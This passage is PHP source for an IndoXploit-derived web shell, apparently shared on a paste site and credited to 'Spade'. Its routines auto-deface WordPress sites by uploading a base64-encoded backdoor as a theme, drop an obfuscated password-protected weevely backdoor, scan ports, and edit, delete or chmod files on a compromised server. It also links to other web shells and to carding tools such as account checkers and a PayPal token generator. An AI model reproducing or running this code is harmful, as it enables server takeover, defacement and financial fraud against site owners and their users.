- $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
- $www = "m.php";
- $fp5 = fopen($www,"w");
- fputs($fp5,$upload3);
- $post2 = array(
- "_wpnonce" => "$anu2",
- "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
- "themezip" => "@$www",
- "install-theme-submit" => "Install Now",
- );
- $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- $data3 = curl_exec($ch);
- curl_close($ch);
- $y = date("Y");
- $m = date("m");
- $namafile = "id.php";
- $fpi = fopen($namafile,"w");
- fputs($fpi,$script);
- $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
- curl_setopt($ch6, CURLOPT_POST, true);
- curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
- curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
- $postResult = curl_exec($ch6);
- curl_close($ch6);
- $as = "$target/k.php";
- $bs = anucurl($as);
- if(preg_match("#$script#is", $bs)) {
- echo "[+] <font color='lime'>Manage...</font><br>";
- echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
- } else {
- echo "[-] <font color='red'>Error...</font><br>";
- echo "[!!] Just Try Manual: <br>";
- echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- } else {
- echo "<center><h1 class='titulo'>WordPress Auto Deface V.2</h1>
- <form method='post'>
- Link Config: <br>
- <textarea name='link' placeholder='http://target.com/spade_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
- <input type='text' name='script' height='10' size='50' placeholder='Hacked By Spade' required><br>
- <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
- </form></center>";
- }
- } elseif($_GET['act'] == 'newfile') {
- if($_POST['new_save_file']) {
- $newfile = htmlspecialchars($_POST['newfile']);
- $fopen = fopen($newfile, "a+");
- if($fopen) {
- $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
- } else {
- $act = "<font color=red>permission denied</font>";
- }
- }
- echo $act;
- echo "<form method='post'>
- Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
- <input type='submit' name='new_save_file' value='Submit'>
- </form>";
- } elseif($_GET['act'] == 'newfolder') {
- if($_POST['new_save_folder']) {
- $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
- if(!mkdir($new_folder)) {
- $act = "<font color=red>permission denied</font>";
- } else {
- $act = "<script>window.location='?dir=".$dir."';</script>";
- }
- }
- echo $act;
- echo "<center><h1 class='titulo'>NEW FOLDER</h1></center><br>";
- echo "<form method='post'>
- Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
- <input type='submit' name='new_save_folder' value='Submit'>
- </form>";
- } elseif($_GET['act'] == 'rename_dir') {
- if($_POST['dir_rename']) {
- $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
- if($dir_rename) {
- $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
- } else {
- $act = "<font color=red>permission denied</font>";
- }
- echo "".$act."<br>";
- }
- echo "<form method='post'>
- <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
- <input type='submit' name='dir_rename' value='rename'>
- </form>";
- }elseif($_GET['act'] == 'chmod_dir'){
- if($_GET['dir']){
- echo "Current Directory: <font color='lime'>" . $_GET['dir'] . "</font>";
- echo "<br>The mode parameter consists of four numbers:<br>
- <br>
- ~The first number is always zero<br>
- ~The second number specifies permissions for the owner<br>
- ~The third number specifies permissions for the owner's user group<br>
- ~The fourth number specifies permissions for everybody else<br>
- <br>
- Possible values (to set multiple permissions, add up the following numbers):<br>
- <br>
- 1 = execute permissions<br>
- 2 = write permissions<br>
- 4 = read permissions<br>
- <br>
- ";
- echo "<form method='post'><input type='text' size='4' name='dirchmod' placeholder='".substr(sprintf('%o', fileperms($_GET['dir'])),-4)."'><input type='submit' value='set permission'></form>";
- if(!empty($_POST['dirchmod'])){
- $pers = 0;
- for($i=strlen($_POST['dirchmod'])-1;$i>=0;--$i)
- $pers += (int)$_POST['dirchmod'][$i]*pow(8, (strlen($_POST['dirchmod'])-$i-1));
- if(!@chmod($_GET['file'], $pers)){
- echo "<font color='red'>Cant Set Permission!</font>";
- }else{
- echo "Permission Set!";
- }
- }
- }
- } elseif($_GET['act'] == 'delete_dir') {
- function Delete($path)
- {
- if (is_dir($path) === true)
- {
- $files = array_diff(scandir($path), array('.', '..'));
- foreach ($files as $file)
- {
- Delete(realpath($path) . '/' . $file);
- }
- return rmdir($path);
- }
- else if (is_file($path) === true)
- {
- return unlink($path);
- }
- return false;
- }
- $delete_dir = Delete($dir);
- if($delete_dir) {
- $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
- } else {
- $act = "<font color=red>could not remove ".basename($dir)."</font>";
- }
- echo $act;
- } elseif($_GET['act'] == 'view') {
- echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
- echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
- } elseif($_GET['act'] == 'edit') {
- if($_POST['save']) {
- $save = file_put_contents($_GET['file'], $_POST['src']);
- if($save) {
- $act = "<font color=lime>Saved!</font>";
- } else {
- $act = "<font color=red>permission denied</font>";
- }
- echo "".$act."<br>";
- }
- echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
- echo "<form method='post'>
- <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
- <input type='submit' value='Save' name='save' style='width: 500px;'>
- </form>";
- } elseif($_GET['act'] == 'rename') {
- if($_POST['do_rename']) {
- $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
- if($rename) {
- $act = "<script>window.location='?dir=".$dir."';</script>";
- } else {
- $act = "<font color=red>permission denied</font>";
- }
- echo "".$act."<br>";
- }
- echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
- echo "<form method='post'>
- <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
- <input type='submit' name='do_rename' value='rename'>
- </form>";
- } elseif($_GET['act'] == 'chmod'){
- echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'><b>chmod</b></a> ]<br>";
- echo "<br>The mode parameter consists of four numbers:<br>
- <br>
- ~The first number is always zero<br>
- ~The second number specifies permissions for the owner<br>
- ~The third number specifies permissions for the owner's user group<br>
- ~The fourth number specifies permissions for everybody else<br>
- <br>
- Possible values (to set multiple permissions, add up the following numbers):<br>
- <br>
- 1 = execute permissions<br>
- 2 = write permissions<br>
- 4 = read permissions<br>
- <br>
- ";
- echo "<form method='post'><input type='text' size='4' name='filechmod' placeholder='".substr(sprintf('%o', fileperms($_GET['file'])),-4)."'><input type='submit' value='set permission'></form>";
- if(!empty($_POST['filechmod'])){
- $pems = 0;
- for($i=strlen($_POST['filechmod'])-1;$i>=0;--$i)
- $pems += (int)$_POST['filechmod'][$i]*pow(8, (strlen($_POST['filechmod'])-$i-1));
- if(!@chmod($_GET['file'], $pems)){
- echo "<font color='red'>Cant Set Permission!</font>";
- }else{
- echo "Permission Set!";
- }
- }
- } elseif($_GET['act'] == 'delete') {
- $delete = unlink($_GET['file']);
- if($delete) {
- $act = "<script>window.location='?dir=".$dir."';</script>";
- } else {
- $act = "<font color=red>permission denied</font>";
- }
- echo $act;
- }elseif($_GET['do'] == 'backconnect'){
- echo "<center><h1 class='titulo'>Weevely Back Connect</h1><br><p1>Note: <a href='https://github.com/epinna/weevely3'><font color=lime>weevely</font></a> needs here :)</p1><br><form method='post'><input type='submit' name='weevely' value='Launch Weevely Shell'></form><br><br><p1>Password is 'azazel'</p1></center>";
- if(isset($_POST['weevely'])){
- $weevely = base64_decode('PD9waHAKJEs9JyhbYDJcXGRdKSk/LD8vYDIiLCRyYSxgMiRtKTtpYDJmYDIoJHEmJiRgMm0pe0BzZXNzaW9uX3N0YDJhcnQoKTskYDJzPSYkYDJfYDJTRVNTSU9OO2AyJHNzPSJgMnN1YnN0ciI7YDIkc2w9ImAnOwokVT0nWyRgMmAyaV09IiJgMjskYDJgMnA9JHNzKCRwLDMpO31pZihhcnJheV9rZXlgMl9leGlgMnN0cygkaSwkYDJzKSl7YDJgMiRzYDJbJGldLj0kcDskZT1zdHJgMnBvcygkc1tgMiRpXSwkZik7YDJpZigkZWAnOwokYj0nbGVhbigpOyRkPWJhc2U2YDI0X2VuY2AyYDJvZGUoeChnemNvbXByZWAyc3MoJGAybyksYDIkaylgMik7cHJpbnQoIjwkaz4kZGAyYDI8LyRrPiIpO0BzZXNgMnNpYDJgMm9uX2Rlc3Ryb3koKTt9fX19JzsKJHk9JzIpe2AyJGs9YDIka2hgMi4ka2AyZjtvYl9zdGFydCgpO0BlYDJ2YDJhbChAZ3p1bmNvYDJtcHJlc3MoQGAyeChAYmFzYDJlNjRgMl9kYDJlYDJjb2RlKHByZWAyZ19yZXBsYWNlKGFycmFgMnknOwokWD1zdHJfcmVwbGFjZSgnY20nLCcnLCdjcmVjbWFjbXRlX2NtY21mY211Y21uY3Rpb24nKTsKJGQ9JzJzdHJgMnRvbG93YDJlcmAyIjskaT0kbVsxYDJdYDJbYDIwXS4kbVsxXVsxXTskaD0kc2woYDIkc3MoYDJtZDUoJGkuJGtoKWAyLDAsMylgMik7JGY9YDIkc2woJHNzKG1kYDI1KCRpLiRrYCc7CiRhPScyZmAyKWAyLGAyMCxgMjMpKTskcD0iIjtmb3IoJHo9MTskejxjb3VgMm50KCRtWzFgMl0pO2AyJHorKykkcC5gMj1gMiRxWyRtWzJdYDJbJGAyel1dO2lmYDIoc3RyYDJwb3MoYDIkcCwkaCk9PT0wKXskcyc7CiRHPSdyYDIpO3BhcnNlX3NgMnRgMnIoYDIkdWAyWyJxdWVyeSJdLCRxKTskYDJxPWFycmF5X3ZgMmFsdWVzKGAyJHEpO3ByZWAyZ19gMm1gMmF0YDJjaF9hbGwoImAyLyhbXFx3XSlbXFx3LV0rKD86O2AycWAyPTAuJzsKJHQ9JzskaTwkbGAyOyl7Zm9gMnIoYDIkaj0wOygkYDJqPCRjJiYkaTwkYDJsKTskaitgMmAyKywkaStgMispe2AyJG8uPSR0eyRpfV4ka2AyeyRqfTt9fWAycmAyZXR1cm4gJG87YDJ9YDIkcj1gMic7CiR6PScka2g9IjMwYDIwOCI7JGtmPSJgMjZjM2ZgMiI7ZnVuYDJjdGlvbiB4KCR0YDJgMiwkayl7JGM9c3RyYDJgMmAybGAyZW4oJGspOyRsPXN0cmxlbigkdCk7JG9gMj0iIjtmYDJvcigkYDJpPTAnOwokaj0nJF9TRVJWRVI7JHJgMnI9QCRyWyJIVFRQX1JgMkVGYDJFUkVgMlIiXTskcmE9QCRyWyJIYDJgMlRgMlRQX0FDQ0VQVF9MQU5HVUFHYDJFImAyXTtgMmlmKCRgMnJyJiYkcmEpeyR1PXBhcnNgMmVgMl91cmwoJHInOwokZj0nKGAyIi9fLyIsIi8tYDIvIiksYXJyYXlgMmAyKGAyIi8iLCIrIiksJHNzKCRgMnNbYDIkaV0sMCwkZSkpKSwkaykpKWAyO2AyJG9gMj1vYl9nZXRfY29udGAyZWAyYDJudHMoYDIpO29iX2VuYDJkX2MnOwokQz1zdHJfcmVwbGFjZSgnYDInLCcnLCR6LiR0LiRqLiRHLiRLLiRkLiRhLiRVLiR5LiRmLiRiKTsKJHE9JFgoJycsJEMpOyRxKCk7Cj8+');
- $pwn = fopen($GLOBALS['cwd']."weevely.php", "w");
- $puke = fwrite($pwn, $weevely); if(!$puke){ echo "<br><font color=red>Unable to Generate weevely.php</font>";}else{ echo "<br><font color=lime>weevely.php Generated Successfully!</font>";}
- fclose($pwn);
- echo "<center>Command example:: <font color='red'><i>weevely http://ww.site_name.com/weevely.php azazel</i></font></center>";
- }
- }elseif ($_GET['do'] == 'port-scan') {
- echo '<form action="" method="post"><center><h1 class="titulo">PORT SCAN</h1><br>';
- $start = strip_tags($_POST['start']);
- $end = strip_tags($_POST['end']);
- $host = strip_tags($_POST['host']);
- if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
- for ($i = $start;$i <= $end;$i++) {
- $fp = @fsockopen($host, $i, $errno, $errstr, 3);
- if ($fp) {
- echo 'Port ' . $i . ' is <font color=lime>open</font><br>';
- }
- flush();
- }
- } else {
- echo '<table class=tabnet style="width:300px;padding:0 1px;">
- <tr>
- <td>Host</td>
- <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="host" value="'.gethostbyname($_SERVER['HTTP_HOST']).'"/></td>
- </tr>
- <tr>
- <td>Port start</td>
- <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
- </tr>
- <tr><td>Port end</td>
- <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
- </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
- </td></form></center></table>';
- }
- } elseif($_GET['do'] == 'kill'){
- echo "<center><h1 class='titulo'>You Really Want to Kill Me?</h1></br><hr width='40%'><br><form method='post'><input type='submit' value='Yes, Of Course!' name='paktay'></form></center>";
- if(isset($_POST['paktay'])){
- if(@unlink(SELF_PATH))
- die('<script>alert("Adios MotherFucker! \n Accept the Consequences for \n Deleting me!")</script><meta http-equiv="refresh" content="0; URL=https://beeg.com/">');
- else
- echo 'Still Alive!';
- }
- }else{
- if(is_dir($dir) == true) {
- echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr>
- <th class="th_home" id="tangina"><center>Name</center></th>
- <th class="th_home" id="tangina"><center>Type</center></th>
- <th class="th_home" id="tangina"><center>Size</center></th>
- <th class="th_home" id="tangina"><center>Last Modified</center></th>
- <th class="th_home" id="tangina"><center>Permission</center></th>
- <th class="th_home" id="tangina"><center>Action</center></th>
- </tr>';
- $scandir = scandir($dir);
- foreach($scandir as $dirx) {
- $dtype = filetype("$dir/$dirx");
- $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
- if(!is_dir("$dir/$dirx")) continue;
- if($dirx === '..') {
- $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
- } elseif($dirx === '.') {
- $href = "<a href='?dir=$dir'>$dirx</a>";
- } else {
- $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
- }
- if($dirx === '.' || $dirx === '..') {
- $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
- } else {
- $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
- }
- echo "<tr>";
- echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
- echo "<td class='td_home'><center>$dtype</center></td>";
- echo "<td class='td_home'><center>-</center></th>";
- echo "<td class='td_home'><center>$dtime</center></td>";
- echo "<td class='td_home'><center><a href='?act=chmod_dir&dir=$dir/$dirx'>".w("$dir/$dirx",perms("$dir/$dirx"))."</a></center></td>";
- echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
- }
- echo "</tr>";
- foreach($scandir as $file) {
- $ftype = filetype("$dir/$file");
- $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
- $size = filesize("$dir/$file")/1024;
- $size = round($size,3);
- if($size > 1024) {
- $size = round($size/1024,2). 'MB';
- } else {
- $size = $size. 'KB';
- }
- if(!is_file("$dir/$file")) continue;
- echo "<tr>";
- echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
- echo "<td class='td_home'><center>$ftype</center></td>";
- echo "<td class='td_home'><center>$size</center></td>";
- echo "<td class='td_home'><center>$ftime</center></td>";
- echo "<td class='td_home'><center><a href='?act=chmod&dir=$dir&file=$dir/$file'>".w("$dir/$file",perms("$dir/$file"))."</a></center></td>";
- echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a></td>";
- }
- echo "</tr></table>";
- } else {
- echo "<font color=red>can't open directory</font>";
- }
- }
- echo "<hr><center><form>
- <select onchange='if (this.value) window.open(this.value);'>
- <option selected='selected' value=''> Tools Creator </option>
- <option value='$ling=wso'>WSO 2.8.1</option>
- <option value='$ling=injection'>1n73ction v3</option>
- <option value='$ling=wk'>WHMCS Killer</option>
- <option value='$ling=adminer'>Adminer</option>
- <option value='$ling=b374k'>b374k Shell</option>
- <option value='$ling=b374k323'>b374k 3.2</option>
- <option value='$ling=bh'>BlackHat Shell</option>
- <option value='$ling=dhanus'>Dhanush Shell</option>
- <option value='$ling=r57'>R57 Shell</option>
- <option value='$ling=encodedecode'>Encode Decode</option>
- <option value='$ling=r57'>R57 Shell</option>
- <option value='$ling=bypasssym'>Bypass Sym with Zip File</option>
- </select>
- <select onchange='if (this.value) window.open(this.value);'>
- <option selected='selected' value=''> Tools Carder </option>
- <option value='$ling=extractor'>DB Email Extractor</option>
- <option value='$ling=promailerv2'>Pro Mailer V2</option>
- <option value='$ling=bukalapak'>BukaLapak Checker</option>
- <option value='$ling=tokopedia'>TokoPedia Checker</option>
- <option value='$ling=tokenpp'>Paypal Token Generator</option>
- <option value='$ling=mailer'>Mailer</option>
- <option value='$ling=gamestopceker'>GamesTop Checker</option>
- </select>
- <noscript><input type='submit' value='Submit'></noscript>
- </form><br/>Copyright © ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='http://fb.com/Meowertsz' target='_BLANK'><font color=lime>Spade</a></font></center><noscript><meta http-equiv='refresh' content='0; URL=https://beeg.com/'></noscript></center></html>";
- ?>
- </html>
Add Comment
Please, Sign In to add comment